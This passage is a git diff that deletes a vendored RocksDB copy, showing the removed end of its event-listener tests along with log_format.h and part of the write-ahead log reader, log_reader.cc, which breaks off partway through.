-    for (size_t c = 0; c < cf_names.size(); ++c) {
-      ColumnFamilyHandle* handle;
-      db->CreateColumnFamily(cf_opts, cf_names[c], &handle);
-      handles.push_back(handle);
-    }
-
-    vec_handles.push_back(std::move(handles));
-    dbs.push_back(db);
-  }
-
-  for (int d = 0; d < kNumDBs; ++d) {
-    for (size_t c = 0; c < cf_names.size(); ++c) {
-      ASSERT_OK(dbs[d]->Put(WriteOptions(), vec_handles[d][c],
-                cf_names[c], cf_names[c]));
-    }
-  }
-
-  for (size_t c = 0; c < cf_names.size(); ++c) {
-    for (int d = 0; d < kNumDBs; ++d) {
-      ASSERT_OK(dbs[d]->Flush(FlushOptions(), vec_handles[d][c]));
-      reinterpret_cast<DBImpl*>(dbs[d])->TEST_WaitForFlushMemTable();
-    }
-  }
-
-  for (auto* listener : listeners) {
-    int pos = 0;
-    for (size_t c = 0; c < cf_names.size(); ++c) {
-      for (int d = 0; d < kNumDBs; ++d) {
-        ASSERT_EQ(listener->flushed_dbs_[pos], dbs[d]);
-        ASSERT_EQ(listener->flushed_column_family_names_[pos], cf_names[c]);
-        pos++;
-      }
-    }
-  }
-
-
-  for (auto handles : vec_handles) {
-    for (auto h : handles) {
-      delete h;
-    }
-    handles.clear();
-  }
-  vec_handles.clear();
-
-  for (auto db : dbs) {
-    delete db;
-  }
-}
-
-TEST_F(EventListenerTest, DisableBGCompaction) {
-  Options options;
-  options.env = CurrentOptions().env;
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  options.enable_thread_tracking = true;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  TestFlushListener* listener = new TestFlushListener(options.env);
-  const int kCompactionTrigger = 1;
-  const int kSlowdownTrigger = 5;
-  const int kStopTrigger = 100;
-  options.level0_file_num_compaction_trigger = kCompactionTrigger;
-  options.level0_slowdown_writes_trigger = kSlowdownTrigger;
-  options.level0_stop_writes_trigger = kStopTrigger;
-  options.max_write_buffer_number = 10;
-  options.listeners.emplace_back(listener);
-  // BG compaction is disabled.  Number of L0 files will simply keeps
-  // increasing in this test.
-  options.compaction_style = kCompactionStyleNone;
-  options.compression = kNoCompression;
-  options.write_buffer_size = 100000;  // Small write buffer
-  options.table_properties_collector_factories.push_back(
-      std::make_shared<TestPropertiesCollectorFactory>());
-
-  CreateAndReopenWithCF({"pikachu"}, options);
-  ColumnFamilyMetaData cf_meta;
-  db_->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-
-  // keep writing until writes are forced to stop.
-  for (int i = 0; static_cast<int>(cf_meta.file_count) < kSlowdownTrigger * 10;
-       ++i) {
-    Put(1, ToString(i), std::string(10000, 'x'), WriteOptions());
-    db_->Flush(FlushOptions(), handles_[1]);
-    db_->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-  }
-  ASSERT_GE(listener->slowdown_count, kSlowdownTrigger * 9);
-}
-
-class TestCompactionReasonListener : public EventListener {
- public:
-  void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override {
-    std::lock_guard<std::mutex> lock(mutex_);
-    compaction_reasons_.push_back(ci.compaction_reason);
-  }
-
-  std::vector<CompactionReason> compaction_reasons_;
-  std::mutex mutex_;
-};
-
-TEST_F(EventListenerTest, CompactionReasonLevel) {
-  Options options;
-  options.env = CurrentOptions().env;
-  options.create_if_missing = true;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(DBTestBase::kNumKeysByGenerateNewRandomFile));
-
-  TestCompactionReasonListener* listener = new TestCompactionReasonListener();
-  options.listeners.emplace_back(listener);
-
-  options.level0_file_num_compaction_trigger = 4;
-  options.compaction_style = kCompactionStyleLevel;
-
-  DestroyAndReopen(options);
-  Random rnd(301);
-
-  // Write 4 files in L0
-  for (int i = 0; i < 4; i++) {
-    GenerateNewRandomFile(&rnd);
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ(listener->compaction_reasons_.size(), 1);
-  ASSERT_EQ(listener->compaction_reasons_[0],
-            CompactionReason::kLevelL0FilesNum);
-
-  DestroyAndReopen(options);
-
-  // Write 3 non-overlapping files in L0
-  for (int k = 1; k <= 30; k++) {
-    ASSERT_OK(Put(Key(k), Key(k)));
-    if (k % 10 == 0) {
-      Flush();
-    }
-  }
-
-  // Do a trivial move from L0 -> L1
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  options.max_bytes_for_level_base = 1;
-  Close();
-  listener->compaction_reasons_.clear();
-  Reopen(options);
-
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_GT(listener->compaction_reasons_.size(), 1);
-
-  for (auto compaction_reason : listener->compaction_reasons_) {
-    ASSERT_EQ(compaction_reason, CompactionReason::kLevelMaxLevelSize);
-  }
-
-  options.disable_auto_compactions = true;
-  Close();
-  listener->compaction_reasons_.clear();
-  Reopen(options);
-
-  Put("key", "value");
-  CompactRangeOptions cro;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-  ASSERT_GT(listener->compaction_reasons_.size(), 0);
-  for (auto compaction_reason : listener->compaction_reasons_) {
-    ASSERT_EQ(compaction_reason, CompactionReason::kManualCompaction);
-  }
-}
-
-TEST_F(EventListenerTest, CompactionReasonUniversal) {
-  Options options;
-  options.env = CurrentOptions().env;
-  options.create_if_missing = true;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(DBTestBase::kNumKeysByGenerateNewRandomFile));
-
-  TestCompactionReasonListener* listener = new TestCompactionReasonListener();
-  options.listeners.emplace_back(listener);
-
-  options.compaction_style = kCompactionStyleUniversal;
-
-  Random rnd(301);
-
-  options.level0_file_num_compaction_trigger = 8;
-  options.compaction_options_universal.max_size_amplification_percent = 100000;
-  options.compaction_options_universal.size_ratio = 100000;
-  DestroyAndReopen(options);
-  listener->compaction_reasons_.clear();
-
-  // Write 8 files in L0
-  for (int i = 0; i < 8; i++) {
-    GenerateNewRandomFile(&rnd);
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(listener->compaction_reasons_.size(), 0);
-  for (auto compaction_reason : listener->compaction_reasons_) {
-    ASSERT_EQ(compaction_reason, CompactionReason::kUniversalSortedRunNum);
-  }
-
-  options.level0_file_num_compaction_trigger = 8;
-  options.compaction_options_universal.max_size_amplification_percent = 1;
-  options.compaction_options_universal.size_ratio = 100000;
-
-  DestroyAndReopen(options);
-  listener->compaction_reasons_.clear();
-
-  // Write 8 files in L0
-  for (int i = 0; i < 8; i++) {
-    GenerateNewRandomFile(&rnd);
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(listener->compaction_reasons_.size(), 0);
-  for (auto compaction_reason : listener->compaction_reasons_) {
-    ASSERT_EQ(compaction_reason, CompactionReason::kUniversalSizeAmplification);
-  }
-
-  options.disable_auto_compactions = true;
-  Close();
-  listener->compaction_reasons_.clear();
-  Reopen(options);
-
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  ASSERT_GT(listener->compaction_reasons_.size(), 0);
-  for (auto compaction_reason : listener->compaction_reasons_) {
-    ASSERT_EQ(compaction_reason, CompactionReason::kManualCompaction);
-  }
-}
-
-TEST_F(EventListenerTest, CompactionReasonFIFO) {
-  Options options;
-  options.env = CurrentOptions().env;
-  options.create_if_missing = true;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(DBTestBase::kNumKeysByGenerateNewRandomFile));
-
-  TestCompactionReasonListener* listener = new TestCompactionReasonListener();
-  options.listeners.emplace_back(listener);
-
-  options.level0_file_num_compaction_trigger = 4;
-  options.compaction_style = kCompactionStyleFIFO;
-  options.compaction_options_fifo.max_table_files_size = 1;
-
-  DestroyAndReopen(options);
-  Random rnd(301);
-
-  // Write 4 files in L0
-  for (int i = 0; i < 4; i++) {
-    GenerateNewRandomFile(&rnd);
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(listener->compaction_reasons_.size(), 0);
-  for (auto compaction_reason : listener->compaction_reasons_) {
-    ASSERT_EQ(compaction_reason, CompactionReason::kFIFOMaxSize);
-  }
-}
-
-class TableFileCreationListener : public EventListener {
- public:
-  class TestEnv : public EnvWrapper {
-   public:
-    TestEnv() : EnvWrapper(Env::Default()) {}
-
-    void SetStatus(Status s) { status_ = s; }
-
-    Status NewWritableFile(const std::string& fname,
-                           std::unique_ptr<WritableFile>* result,
-                           const EnvOptions& options) {
-      if (fname.size() > 4 && fname.substr(fname.size() - 4) == ".sst") {
-        if (!status_.ok()) {
-          return status_;
-        }
-      }
-      return Env::Default()->NewWritableFile(fname, result, options);
-    }
-
-   private:
-    Status status_;
-  };
-
-  TableFileCreationListener() {
-    for (int i = 0; i < 2; i++) {
-      started_[i] = finished_[i] = failure_[i] = 0;
-    }
-  }
-
-  int Index(TableFileCreationReason reason) {
-    int idx;
-    switch (reason) {
-      case TableFileCreationReason::kFlush:
-        idx = 0;
-        break;
-      case TableFileCreationReason::kCompaction:
-        idx = 1;
-        break;
-      default:
-        idx = -1;
-    }
-    return idx;
-  }
-
-  void CheckAndResetCounters(int flush_started, int flush_finished,
-                             int flush_failure, int compaction_started,
-                             int compaction_finished, int compaction_failure) {
-    ASSERT_EQ(started_[0], flush_started);
-    ASSERT_EQ(finished_[0], flush_finished);
-    ASSERT_EQ(failure_[0], flush_failure);
-    ASSERT_EQ(started_[1], compaction_started);
-    ASSERT_EQ(finished_[1], compaction_finished);
-    ASSERT_EQ(failure_[1], compaction_failure);
-    for (int i = 0; i < 2; i++) {
-      started_[i] = finished_[i] = failure_[i] = 0;
-    }
-  }
-
-  void OnTableFileCreationStarted(
-      const TableFileCreationBriefInfo& info) override {
-    int idx = Index(info.reason);
-    if (idx >= 0) {
-      started_[idx]++;
-    }
-    ASSERT_GT(info.db_name.size(), 0U);
-    ASSERT_GT(info.cf_name.size(), 0U);
-    ASSERT_GT(info.file_path.size(), 0U);
-    ASSERT_GT(info.job_id, 0);
-  }
-
-  void OnTableFileCreated(const TableFileCreationInfo& info) override {
-    int idx = Index(info.reason);
-    if (idx >= 0) {
-      finished_[idx]++;
-    }
-    ASSERT_GT(info.db_name.size(), 0U);
-    ASSERT_GT(info.cf_name.size(), 0U);
-    ASSERT_GT(info.file_path.size(), 0U);
-    ASSERT_GT(info.job_id, 0);
-    if (info.status.ok()) {
-      ASSERT_GT(info.table_properties.data_size, 0U);
-      ASSERT_GT(info.table_properties.raw_key_size, 0U);
-      ASSERT_GT(info.table_properties.raw_value_size, 0U);
-      ASSERT_GT(info.table_properties.num_data_blocks, 0U);
-      ASSERT_GT(info.table_properties.num_entries, 0U);
-    } else {
-      if (idx >= 0) {
-        failure_[idx]++;
-      }
-    }
-  }
-
-  TestEnv test_env;
-  int started_[2];
-  int finished_[2];
-  int failure_[2];
-};
-
-TEST_F(EventListenerTest, TableFileCreationListenersTest) {
-  auto listener = std::make_shared<TableFileCreationListener>();
-  Options options;
-  options.create_if_missing = true;
-  options.listeners.push_back(listener);
-  options.env = &listener->test_env;
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("foo", "aaa"));
-  ASSERT_OK(Put("bar", "bbb"));
-  ASSERT_OK(Flush());
-  dbfull()->TEST_WaitForFlushMemTable();
-  listener->CheckAndResetCounters(1, 1, 0, 0, 0, 0);
-
-  ASSERT_OK(Put("foo", "aaa1"));
-  ASSERT_OK(Put("bar", "bbb1"));
-  listener->test_env.SetStatus(Status::NotSupported("not supported"));
-  ASSERT_NOK(Flush());
-  listener->CheckAndResetCounters(1, 1, 1, 0, 0, 0);
-  listener->test_env.SetStatus(Status::OK());
-
-  Reopen(options);
-  ASSERT_OK(Put("foo", "aaa2"));
-  ASSERT_OK(Put("bar", "bbb2"));
-  ASSERT_OK(Flush());
-  dbfull()->TEST_WaitForFlushMemTable();
-  listener->CheckAndResetCounters(1, 1, 0, 0, 0, 0);
-
-  const Slice kRangeStart = "a";
-  const Slice kRangeEnd = "z";
-  dbfull()->CompactRange(CompactRangeOptions(), &kRangeStart, &kRangeEnd);
-  dbfull()->TEST_WaitForCompact();
-  listener->CheckAndResetCounters(0, 0, 0, 1, 1, 0);
-
-  ASSERT_OK(Put("foo", "aaa3"));
-  ASSERT_OK(Put("bar", "bbb3"));
-  ASSERT_OK(Flush());
-  listener->test_env.SetStatus(Status::NotSupported("not supported"));
-  dbfull()->CompactRange(CompactRangeOptions(), &kRangeStart, &kRangeEnd);
-  dbfull()->TEST_WaitForCompact();
-  listener->CheckAndResetCounters(1, 1, 0, 1, 1, 1);
-}
-
-class MemTableSealedListener : public EventListener {
-private:
-  SequenceNumber latest_seq_number_;
-public:
-  MemTableSealedListener() {}
-  void OnMemTableSealed(const MemTableInfo& info) override {
-    latest_seq_number_ = info.first_seqno;
-  }
-
-  void OnFlushCompleted(DB* /*db*/,
-    const FlushJobInfo& flush_job_info) override {
-    ASSERT_LE(flush_job_info.smallest_seqno, latest_seq_number_);
-  }
-};
-
-TEST_F(EventListenerTest, MemTableSealedListenerTest) {
-  auto listener = std::make_shared<MemTableSealedListener>();
-  Options options;
-  options.create_if_missing = true;
-  options.listeners.push_back(listener);
-  DestroyAndReopen(options);
-
-  for (unsigned int i = 0; i < 10; i++) {
-    std::string tag = std::to_string(i);
-    ASSERT_OK(Put("foo"+tag, "aaa"));
-    ASSERT_OK(Put("bar"+tag, "bbb"));
-
-    ASSERT_OK(Flush());
-  }
-}
-
-class ColumnFamilyHandleDeletionStartedListener : public EventListener {
- private:
-  std::vector<std::string> cfs_;
-  int counter;
-
- public:
-  explicit ColumnFamilyHandleDeletionStartedListener(
-      const std::vector<std::string>& cfs)
-      : cfs_(cfs), counter(0) {
-    cfs_.insert(cfs_.begin(), kDefaultColumnFamilyName);
-  }
-  void OnColumnFamilyHandleDeletionStarted(
-      ColumnFamilyHandle* handle) override {
-    ASSERT_EQ(cfs_[handle->GetID()], handle->GetName());
-    counter++;
-  }
-  int getCounter() { return counter; }
-};
-
-TEST_F(EventListenerTest, ColumnFamilyHandleDeletionStartedListenerTest) {
-  std::vector<std::string> cfs{"pikachu", "eevee", "Mewtwo"};
-  auto listener =
-      std::make_shared<ColumnFamilyHandleDeletionStartedListener>(cfs);
-  Options options;
-  options.env = CurrentOptions().env;
-  options.create_if_missing = true;
-  options.listeners.push_back(listener);
-  CreateAndReopenWithCF(cfs, options);
-  ASSERT_EQ(handles_.size(), 4);
-  delete handles_[3];
-  delete handles_[2];
-  delete handles_[1];
-  handles_.resize(1);
-  ASSERT_EQ(listener->getCounter(), 3);
-}
-
-class BackgroundErrorListener : public EventListener {
- private:
-  SpecialEnv* env_;
-  int counter_;
-
- public:
-  BackgroundErrorListener(SpecialEnv* env) : env_(env), counter_(0) {}
-
-  void OnBackgroundError(BackgroundErrorReason reason, Status* bg_error) override {
-    if (counter_ == 0) {
-      // suppress the first error and disable write-dropping such that a retry
-      // can succeed.
-      *bg_error = Status::OK();
-      env_->drop_writes_.store(false, std::memory_order_release);
-      env_->no_slowdown_ = false;
-    }
-    ++counter_;
-  }
-
-  int counter() { return counter_; }
-};
-
-TEST_F(EventListenerTest, BackgroundErrorListenerFailedFlushTest) {
-  auto listener = std::make_shared<BackgroundErrorListener>(env_);
-  Options options;
-  options.create_if_missing = true;
-  options.env = env_;
-  options.listeners.push_back(listener);
-  options.memtable_factory.reset(new SpecialSkipListFactory(1));
-  options.paranoid_checks = true;
-  DestroyAndReopen(options);
-
-  // the usual TEST_WaitForFlushMemTable() doesn't work for failed flushes, so
-  // forge a custom one for the failed flush case.
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::BGWorkFlush:done",
-        "EventListenerTest:BackgroundErrorListenerFailedFlushTest:1"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  env_->drop_writes_.store(true, std::memory_order_release);
-  env_->no_slowdown_ = true;
-
-  ASSERT_OK(Put("key0", "val"));
-  ASSERT_OK(Put("key1", "val"));
-  TEST_SYNC_POINT("EventListenerTest:BackgroundErrorListenerFailedFlushTest:1");
-  ASSERT_EQ(1, listener->counter());
-  ASSERT_OK(Put("key2", "val"));
-  ASSERT_OK(dbfull()->TEST_WaitForFlushMemTable());
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-}
-
-TEST_F(EventListenerTest, BackgroundErrorListenerFailedCompactionTest) {
-  auto listener = std::make_shared<BackgroundErrorListener>(env_);
-  Options options;
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.env = env_;
-  options.level0_file_num_compaction_trigger = 2;
-  options.listeners.push_back(listener);
-  options.memtable_factory.reset(new SpecialSkipListFactory(2));
-  options.paranoid_checks = true;
-  DestroyAndReopen(options);
-
-  // third iteration triggers the second memtable's flush
-  for (int i = 0; i < 3; ++i) {
-    ASSERT_OK(Put("key0", "val"));
-    if (i > 0) {
-      ASSERT_OK(dbfull()->TEST_WaitForFlushMemTable());
-    }
-    ASSERT_OK(Put("key1", "val"));
-  }
-  ASSERT_EQ(2, NumTableFilesAtLevel(0));
-
-  env_->drop_writes_.store(true, std::memory_order_release);
-  env_->no_slowdown_ = true;
-  ASSERT_OK(dbfull()->SetOptions({{"disable_auto_compactions", "false"}}));
-  ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  ASSERT_EQ(1, listener->counter());
-
-  // trigger flush so compaction is triggered again; this time it succeeds
-  ASSERT_OK(Put("key0", "val"));
-  ASSERT_OK(dbfull()->TEST_WaitForFlushMemTable());
-  ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/log_format.h b/thirdparty/rocksdb/db/log_format.h
deleted file mode 100644
index be22201..0000000
--- a/thirdparty/rocksdb/db/log_format.h
+++ /dev/null
@@ -1,45 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Log format information shared by reader and writer.
-// See ../doc/log_format.txt for more detail.
-
-#pragma once
-namespace rocksdb {
-namespace log {
-
-enum RecordType {
-  // Zero is reserved for preallocated files
-  kZeroType = 0,
-  kFullType = 1,
-
-  // For fragments
-  kFirstType = 2,
-  kMiddleType = 3,
-  kLastType = 4,
-
-  // For recycled log files
-  kRecyclableFullType = 5,
-  kRecyclableFirstType = 6,
-  kRecyclableMiddleType = 7,
-  kRecyclableLastType = 8,
-};
-static const int kMaxRecordType = kRecyclableLastType;
-
-static const unsigned int kBlockSize = 32768;
-
-// Header is checksum (4 bytes), length (2 bytes), type (1 byte)
-static const int kHeaderSize = 4 + 2 + 1;
-
-// Recyclable header is checksum (4 bytes), type (1 byte), log number
-// (4 bytes), length (2 bytes).
-static const int kRecyclableHeaderSize = 4 + 1 + 4 + 2;
-
-}  // namespace log
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/log_reader.cc b/thirdparty/rocksdb/db/log_reader.cc
deleted file mode 100644
index cae5d8e..0000000
--- a/thirdparty/rocksdb/db/log_reader.cc
+++ /dev/null
@@ -1,432 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/log_reader.h"
-
-#include <stdio.h>
-#include "rocksdb/env.h"
-#include "util/coding.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-namespace log {
-
-Reader::Reporter::~Reporter() {
-}
-
-Reader::Reader(std::shared_ptr<Logger> info_log,
-               unique_ptr<SequentialFileReader>&& _file, Reporter* reporter,
-               bool checksum, uint64_t initial_offset, uint64_t log_num)
-    : info_log_(info_log),
-      file_(std::move(_file)),
-      reporter_(reporter),
-      checksum_(checksum),
-      backing_store_(new char[kBlockSize]),
-      buffer_(),
-      eof_(false),
-      read_error_(false),
-      eof_offset_(0),
-      last_record_offset_(0),
-      end_of_buffer_offset_(0),
-      initial_offset_(initial_offset),
-      log_number_(log_num),
-      recycled_(false) {}
-
-Reader::~Reader() {
-  delete[] backing_store_;
-}
-
-bool Reader::SkipToInitialBlock() {
-  size_t initial_offset_in_block = initial_offset_ % kBlockSize;
-  uint64_t block_start_location = initial_offset_ - initial_offset_in_block;
-
-  // Don't search a block if we'd be in the trailer
-  if (initial_offset_in_block > kBlockSize - 6) {
-    block_start_location += kBlockSize;
-  }
-
-  end_of_buffer_offset_ = block_start_location;
-
-  // Skip to start of first block that can contain the initial record
-  if (block_start_location > 0) {
-    Status skip_status = file_->Skip(block_start_location);
-    if (!skip_status.ok()) {
-      ReportDrop(static_cast<size_t>(block_start_location), skip_status);
-      return false;
-    }
-  }
-
-  return true;
-}
-
-// For kAbsoluteConsistency, on clean shutdown we don't expect any error
-// in the log files.  For other modes, we can ignore only incomplete records
-// in the last log file, which are presumably due to a write in progress
-// during restart (or from log recycling).
-//
-// TODO krad: Evaluate if we need to move to a more strict mode where we
-// restrict the inconsistency to only the last log
-bool Reader::ReadRecord(Slice* record, std::string* scratch,
-                        WALRecoveryMode wal_recovery_mode) {
-  if (last_record_offset_ < initial_offset_) {
-    if (!SkipToInitialBlock()) {
-      return false;
-    }
-  }
-
-  scratch->clear();
-  record->clear();
-  bool in_fragmented_record = false;
-  // Record offset of the logical record that we're reading
-  // 0 is a dummy value to make compilers happy
-  uint64_t prospective_record_offset = 0;
-
-  Slice fragment;
-  while (true) {
-    uint64_t physical_record_offset = end_of_buffer_offset_ - buffer_.size();
-    size_t drop_size = 0;
-    const unsigned int record_type = ReadPhysicalRecord(&fragment, &drop_size);
-    switch (record_type) {
-      case kFullType:
-      case kRecyclableFullType:
-        if (in_fragmented_record && !scratch->empty()) {
-          // Handle bug in earlier versions of log::Writer where
-          // it could emit an empty kFirstType record at the tail end
-          // of a block followed by a kFullType or kFirstType record
-          // at the beginning of the next block.
-          ReportCorruption(scratch->size(), "partial record without end(1)");
-        }
-        prospective_record_offset = physical_record_offset;
-        scratch->clear();
-        *record = fragment;
-        last_record_offset_ = prospective_record_offset;
-        return true;
-
-      case kFirstType:
-      case kRecyclableFirstType:
-        if (in_fragmented_record && !scratch->empty()) {
-          // Handle bug in earlier versions of log::Writer where
-          // it could emit an empty kFirstType record at the tail end
-          // of a block followed by a kFullType or kFirstType record
-          // at the beginning of the next block.
-          ReportCorruption(scratch->size(), "partial record without end(2)");
-        }
-        prospective_record_offset = physical_record_offset;
-        scratch->assign(fragment.data(), fragment.size());
-        in_fragmented_record = true;
-        break;
-
-      case kMiddleType:
-      case kRecyclableMiddleType:
-        if (!in_fragmented_record) {
-          ReportCorruption(fragment.size(),
-                           "missing start of fragmented record(1)");
-        } else {
-          scratch->append(fragment.data(), fragment.size());
-        }
-        break;
-
-      case kLastType:
-      case kRecyclableLastType:
-        if (!in_fragmented_record) {
-          ReportCorruption(fragment.size(),
-                           "missing start of fragmented record(2)");
-        } else {
-          scratch->append(fragment.data(), fragment.size());
-          *record = Slice(*scratch);
-          last_record_offset_ = prospective_record_offset;
-          return true;
-        }
-        break;
-
-      case kBadHeader:
-        if (wal_recovery_mode == WALRecoveryMode::kAbsoluteConsistency) {
-          // in clean shutdown we don't expect any error in the log files
-          ReportCorruption(drop_size, "truncated header");
-        }
-      // fall-thru
-
-      case kEof:
-        if (in_fragmented_record) {
-          if (wal_recovery_mode == WALRecoveryMode::kAbsoluteConsistency) {
-            // in clean shutdown we don't expect any error in the log files
-            ReportCorruption(scratch->size(), "error reading trailing data");
-          }
-          // This can be caused by the writer dying immediately after
-          //  writing a physical record but before completing the next; don't
-          //  treat it as a corruption, just ignore the entire logical record.
-          scratch->clear();
-        }
-        return false;
-
-      case kOldRecord:
-        if (wal_recovery_mode != WALRecoveryMode::kSkipAnyCorruptedRecords) {
-          // Treat a record from a previous instance of the log as EOF.
-          if (in_fragmented_record) {
-            if (wal_recovery_mode == WALRecoveryMode::kAbsoluteConsistency) {
-              // in clean shutdown we don't expect any error in the log files
-              ReportCorruption(scratch->size(), "error reading trailing data");
-            }
-            // This can be caused by the writer dying immediately after
-            //  writing a physical record but before completing the next; don't
-            //  treat it as a corruption, just ignore the entire logical record.
-            scratch->clear();
-          }
-          return false;
-        }
-      // fall-thru
-
-      case kBadRecord:
-        if (in_fragmented_record) {
-          ReportCorruption(scratch->size(), "error in middle of record");
-          in_fragmented_record = false;
-          scratch->clear();
-        }
-        break;
-
-      case kBadRecordLen:
-      case kBadRecordChecksum:
-        if (recycled_ &&
-            wal_recovery_mode ==
-                WALRecoveryMode::kTolerateCorruptedTailRecords) {
-          scratch->clear();
-          return false;
-        }
-        if (record_type == kBadRecordLen) {
-          ReportCorruption(drop_size, "bad record length");
-        } else {
-          ReportCorruption(drop_size, "checksum mismatch");
-        }
-        if (in_fragmented_record) {
-          ReportCorruption(scratch->size(), "error in middle of record");
-          in_fragmented_record = false;
-          scratch->clear();
-        }
-        break;
-
-      default: {
-        char buf[40];
-        snprintf(buf, sizeof(buf), "unknown record type %u", record_type);
-        ReportCorruption(
-            (fragment.size() + (in_fragmented_record ? scratch->size() : 0)),
-            buf);
-        in_fragmented_record = false;
-        scratch->clear();
-        break;
-      }
-    }
-  }
-  return false;
-}
-
-uint64_t Reader::LastRecordOffset() {
-  return last_record_offset_;
-}
-
-void Reader::UnmarkEOF() {
-  if (read_error_) {
-    return;
-  }
-
-  eof_ = false;
-
-  if (eof_offset_ == 0) {
-    return;
-  }
-
-  // If the EOF was in the middle of a block (a partial block was read) we have
-  // to read the rest of the block as ReadPhysicalRecord can only read full
-  // blocks and expects the file position indicator to be aligned to the start
-  // of a block.
-  //
-  //      consumed_bytes + buffer_size() + remaining == kBlockSize
-
-  size_t consumed_bytes = eof_offset_ - buffer_.size();
-  size_t remaining = kBlockSize - eof_offset_;
-
-  // backing_store_ is used to concatenate what is left in buffer_ and
-  // the remainder of the block. If buffer_ already uses backing_store_,
-  // we just append the new data.
-  if (buffer_.data() != backing_store_ + consumed_bytes) {
-    // Buffer_ does not use backing_store_ for storage.
-    // Copy what is left in buffer_ to backing_store.
-    memmove(backing_store_ + consumed_bytes, buffer_.data(), buffer_.size());
-  }
-
-  Slice read_buffer;
-  Status status = file_->Read(remaining, &read_buffer,
-    backing_store_ + eof_offset_);
-
-  size_t added = read_buffer.size();
-  end_of_buffer_offset_ += added;
-
-  if (!status.ok()) {
-    if (added > 0) {
-      ReportDrop(added, status);
-    }
-
-    read_error_ = true;
-    return;
-  }
-
-  if (read_buffer.data() != backing_store_ + eof_offset_) {
-    // Read did not write to backing_store_
-    memmove(backing_store_ + eof_offset_, read_buffer.data(),
-      read_buffer.size());
-  }
-
-  buffer_ = Slice(backing_store_ + consumed_bytes,
-    eof_offset_ + added - consumed_bytes);
-
-  if (added < remaining) {
-    eof_ = true;
-    eof_offset_ += added;
-  } else {
-    eof_offset_ = 0;
-  }
-}
-
-void Reader::ReportCorruption(size_t bytes, const char* reason) {
-  ReportDrop(bytes, Status::Corruption(reason));
-}
-
-void Reader::ReportDrop(size_t bytes, const Status& reason) {
-  if (reporter_ != nullptr &&
-      end_of_buffer_offset_ - buffer_.size() - bytes >= initial_offset_) {
-    reporter_->Corruption(bytes, reason);
-  }
-}
-
-bool Reader::ReadMore(size_t* drop_size, int *error) {
-  if (!eof_ && !read_error_) {
-    // Last read was a full read, so this is a trailer to skip
-    buffer_.clear();
-    Status status = file_->Read(kBlockSize, &buffer_, backing_store_);
-    end_of_buffer_offset_ += buffer_.size();
-    if (!status.ok()) {
-      buffer_.clear();
-      ReportDrop(kBlockSize, status);
-      read_error_ = true;
-      *error = kEof;
-      return false;
-    } else if (buffer_.size() < (size_t)kBlockSize) {
-      eof_ = true;
-      eof_offset_ = buffer_.size();
-    }
-    return true;
-  } else {
-    // Note that if buffer_ is non-empty, we have a truncated header at the
-    //  end of the file, which can be caused by the writer crashing in the
-    //  middle of writing the header. Unless explicitly requested we don't
-    //  considering this an error, just report EOF.
-    if (buffer_.size()) {
-      *drop_size = buffer_.size();
-      buffer_.clear();
-      *error = kBadHeader;
-      return false;
-    }
-    buffer_.clear();
-    *error = kEof;
-    return false;
-  }
-}
-
-unsigned int Reader::ReadPhysicalRecord(Slice* result, size_t* drop_size) {
-  while (true) {
-    // We need at least the minimum header size
-    if (buffer_.size() < (size_t)kHeaderSize) {
-      int r;
-      if (!ReadMore(drop_size, &r)) {
-        return r;
-      }
-      continue;
-    }
-
-    // Parse the header
-    const char* header = buffer_.data();
-    const uint32_t a = static_cast<uint32_t>(header[4]) & 0xff;
-    const uint32_t b = static_cast<uint32_t>(header[5]) & 0xff;
-    const unsigned int type = header[6];
-    const uint32_t length = a | (b << 8);
-    int header_size = kHeaderSize;
-    if (type >= kRecyclableFullType && type <= kRecyclableLastType) {
-      if (end_of_buffer_offset_ - buffer_.size() == 0) {
-        recycled_ = true;
-      }
-      header_size = kRecyclableHeaderSize;
-      // We need enough for the larger header
-      if (buffer_.size() < (size_t)kRecyclableHeaderSize) {
-        int r;
-        if (!ReadMore(drop_size, &r)) {
-          return r;
-        }
-        continue;
-      }
